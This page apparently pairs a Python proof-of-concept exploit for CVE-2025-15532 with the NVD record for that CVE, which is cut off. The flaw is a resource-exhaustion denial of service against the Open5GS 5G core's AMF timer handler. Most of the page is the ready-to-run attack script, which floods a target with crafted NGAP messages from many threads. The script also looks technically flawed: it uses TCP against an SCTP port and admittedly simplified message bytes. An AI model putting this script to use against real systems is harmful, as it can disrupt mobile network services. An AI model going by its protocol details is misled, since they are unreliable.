CVE-2025-15532

#!/usr/bin/env python3 """ CVE-2025-15532 PoC - Open5GS Timer Handler Resource Consumption This PoC demonstrates resource exhaustion through excessive timer creation. """ import socket import struct import time from concurrent.futures import ThreadPoolExecutor def create_ngap_init_message(ue_id): """Generate NGAP Initial UE Message to trigger timer creation""" # Simplified NGAP header structure ngap_pdu = b'\x00\x00' # Add Procedure Code for Initial UE Message (0x0c) ngap_pdu += b'\x00\x0c' # Add criticality (reject) ngap_pdu += b'\x00' # Add message format ngap_pdu += b'\x02\x00\x00\x01' # Add UE ID ngap_pdu += struct.pack('>Q', ue_id) return ngap_pdu def send_trigger_request(host, port, ue_id): """Send triggering request to Open5GS AMF""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((host, port)) message = create_ngap_init_message(ue_id) sock.send(message) sock.close() return True except Exception as e: print(f"Request failed: {e}") return False def exploit_cve_2025_15532(target_ip, amf_port=38412, threads=50, duration=60): """ Exploit resource consumption in Open5GS Timer Handler Args: target_ip: Open5GS AMF IP address amf_port: AMF SCTP port (default: 38412) threads: Number of concurrent threads duration: Attack duration in seconds """ print(f"[*] Starting CVE-2025-15532 exploit against {target_ip}:{amf_port}") print(f"[*] Using {threads} threads for {duration} seconds") start_time = time.time() ue_id = 0x100000000000001 request_count = 0 while time.time() - start_time < duration: with ThreadPoolExecutor(max_workers=threads) as executor: futures = [] for i in range(threads): future = executor.submit(send_trigger_request, target_ip, amf_port, ue_id + i) futures.append(future) for future in futures: if future.result(): request_count += 1 print(f"[*] Sent batch, total requests: {request_count}") time.sleep(0.1) print(f"[+] Attack completed. Total requests sent: {request_count}") print(f"[+] Target timer handler should be experiencing resource exhaustion") if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python3 cve-2025-15532_poc.py <target_ip> [port] [threads] [duration]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 38412 threads = int(sys.argv[3]) if len(sys.argv) > 3 else 50 duration = int(sys.argv[4]) if len(sys.argv) > 4 else 60 exploit_cve_2025_15532(target, port, threads, duration)

{"cve": {"id": "CVE-2025-15532", "sourceIdentifier": "[email protected]", "published": "2026-01-17T17:15:47.800", "lastModified": "2026-02-23T09:16:28.287", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Open5GS up to 2.7.5. This issue affects some unknown processing of the component Timer Handler. The manipulation results in resource consumption. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The patch is identified as c7c131f8d2cb1195ada5e0e691b6868ebcd8a845. It is best practice to apply a patch to resolve this issue."}, {"lang": "es", "value": "Una falla de seguridad ha sido descubierta en Open5GS hasta 2.7.5. Este problema afecta a algún procesamiento desconocido del componente Timer Handler. La manipulación resulta en consumo de recursos. El ataque puede ser realizado de forma remota. El exploit ha sido publicado y puede ser utilizado para ataques. El parche se identifica como c7c131f8d2cb1195ada5e0e691b6868ebcd8a845. Es una buena práctica aplicar un parche para resolver este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-404"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.5", "matchCriteriaId": "7D0FBF91-87F5-4984-AC37-744D9BFC13C0"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/commit/c7c131f8d2cb1195ada5e0e691b6868ebcd8a845", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open5gs/open5gs/issues/4220", "sour ... (truncated)